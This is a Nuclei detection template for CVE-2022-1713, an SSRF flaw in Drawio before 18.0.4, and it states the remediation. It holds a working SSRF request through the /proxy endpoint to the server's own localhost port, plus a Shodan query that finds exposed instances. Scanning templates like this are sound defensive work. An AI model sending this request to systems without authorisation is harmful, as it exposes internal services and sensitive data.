48 lines
1.6 KiB
YAML
48 lines
1.6 KiB
YAML
id: CVE-2022-1713
|
|
|
|
info:
|
|
name: Drawio <18.0.4 - Server-Side Request Forgery
|
|
author: pikpikcu
|
|
severity: high
|
|
description: |
|
|
Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
|
|
remediation: |
|
|
Upgrade Drawio to version 18.0.4 or later to mitigate the SSRF vulnerability.
|
|
reference:
|
|
- https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11
|
|
- https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1713
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-1713
|
|
cwe-id: CWE-918
|
|
epss-score: 0.01031
|
|
epss-percentile: 0.82147
|
|
cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: diagrams
|
|
product: drawio
|
|
shodan-query: http.title:"Flowchart Maker"
|
|
tags: drawio,ssrf,oss,huntr,cve,cve2022
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /proxy?url=http%3a//0:8080/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<title>Flowchart Maker & Online Diagram Software</title>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/octet-stream"
|
|
# digest: 4b0a004830460221009195a8dfde0321bc034dca9f95f3a7ff25c7947a0d17aa112e08cd2039177f1e0221009d2ad17fc58bfadebfac40a55ff83995bc569e416959a1fa2953ed8124f8b248:922c64590222798bb761d5b6d8e72950 |